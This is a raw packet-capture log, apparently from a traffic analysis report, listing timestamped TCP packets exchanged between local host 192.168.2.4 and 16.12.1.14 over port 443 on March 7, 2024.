                                        Mar 7, 2024 10:36:10.731328964 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.731348038 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.732367992 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.732389927 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.732448101 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.732459068 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.732495070 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.732511997 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.733628988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.733655930 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.733715057 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.733728886 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.733752966 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.733776093 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.734390974 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.734411001 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.734457970 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.734468937 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.734496117 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.734517097 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.735285044 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.735310078 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.735353947 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.735366106 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.735390902 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.735409975 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.736185074 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.736205101 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.736274958 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.736287117 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.736352921 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.737407923 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.737426996 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.737487078 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.737498999 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.737524033 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.738640070 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.738656998 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.738666058 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.738677979 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.738703012 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.738744020 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.739741087 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.739761114 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.739809990 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.739820957 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.739845991 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.740078926 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.740648031 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.740669012 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.740730047 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.740744114 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.740770102 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.740784883 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.741508961 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.741528988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.741578102 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.741588116 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.741617918 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.741640091 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.742522001 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.742552996 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.742595911 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.742607117 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.742643118 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.742660046 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.743563890 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.743596077 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.743626118 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.743637085 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.743671894 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.743690968 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.744829893 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.744862080 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.744898081 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.744910002 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.744952917 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.744976997 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.746031046 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.746062994 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.746102095 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.746114016 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.746140003 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.746164083 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.747071981 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.747103930 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.747162104 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.747174025 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.747205019 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.747231007 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.747725964 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.747756958 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.747792006 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.747806072 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.747833014 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.747864962 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.748792887 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.748836040 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.748919010 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.748933077 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.749092102 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.749577999 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.749609947 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.749649048 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.749660015 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.749695063 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.749711037 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.750303984 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.750334978 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.750377893 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.750389099 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.750426054 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.750442982 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.751080036 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.751111031 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.751142979 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.751157999 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.751194000 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.751220942 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.752027988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.752058983 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.752110004 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.752121925 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.752161026 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.752188921 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.752779961 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.752820969 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.752892017 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.752912998 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.752926111 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.752959013 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.753463984 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.753500938 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.753550053 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.753559113 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.753582001 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.753611088 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.754160881 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.754196882 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.754242897 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.754249096 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.754278898 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.754297018 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.754992962 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.755029917 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.755125046 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.755131960 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.755141973 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.755187035 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.755784988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.755822897 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.755875111 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.755883932 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.755896091 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.755922079 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.756520033 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.756556988 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.756598949 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.756604910 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.756634951 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.756717920 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.757164001 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.757201910 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.757247925 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.757253885 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.757270098 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.757319927 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.757798910 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.757839918 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.757873058 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.757878065 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.757904053 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.757915020 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.758547068 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.758584976 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.758609056 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.758615017 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:10.758641958 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:10.758658886 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.466589928 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.466593981 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.466609955 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.466619015 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.466630936 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.466634035 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.466681004 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.466697931 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.466722012 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.466758966 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.466773987 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.466794968 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.466799974 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.466814995 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.466824055 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.466835976 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.466840029 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.466885090 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.466908932 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.466942072 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.466979980 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.466995955 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467015982 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467020988 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467044115 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467046022 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467060089 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467067003 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467092037 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467111111 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467129946 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467152119 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467186928 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467202902 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467227936 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467232943 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467250109 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467257977 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467273951 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467278004 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467324972 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467338085 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467363119 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467398882 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467415094 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467436075 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467438936 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467461109 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467466116 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467483044 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467488050 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467530012 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467545986 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467565060 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467601061 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467616081 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467637062 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467641115 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467662096 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467664957 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467684984 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467694998 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467715979 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467735052 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467741966 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467755079 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467777014 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467803001 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467823029 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467843056 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467847109 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467869043 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467873096 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467888117 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467900991 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467917919 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467935085 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.467953920 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.467974901 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468012094 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468027115 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468046904 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468050957 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468071938 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468076944 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468089104 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468099117 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468118906 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468137026 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468156099 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468180895 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468238115 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468238115 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468255043 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468276978 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468305111 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468321085 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468321085 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468334913 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468364954 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468373060 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468384981 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468398094 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468431950 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468440056 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468440056 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468456984 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468486071 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468493938 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468502998 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468513966 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468539953 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468543053 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468569040 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468578100 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468606949 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468626976 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468626976 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468648911 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468666077 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468699932 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468715906 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468738079 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468740940 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468760014 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468764067 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468780994 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468784094 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468830109 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468848944 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468869925 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468908072 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468923092 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468945026 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468949080 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468967915 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.468981028 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.468996048 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469012976 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469029903 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469047070 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469053030 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469064951 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469085932 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469120979 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469120979 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469136953 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469156027 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469166040 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469189882 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469192028 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469203949 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469213009 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469263077 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469279051 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469297886 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469333887 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469348907 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469369888 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469373941 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469393969 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469399929 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469418049 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469424963 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469468117 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469470024 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469485044 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469501972 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469533920 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469552994 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469561100 CET49729443192.168.2.416.12.1.14
                                        Mar 7, 2024 10:36:11.469564915 CET4434972916.12.1.14192.168.2.4
                                        Mar 7, 2024 10:36:11.469585896 CET4434972916.12.1.14192.168.2.4
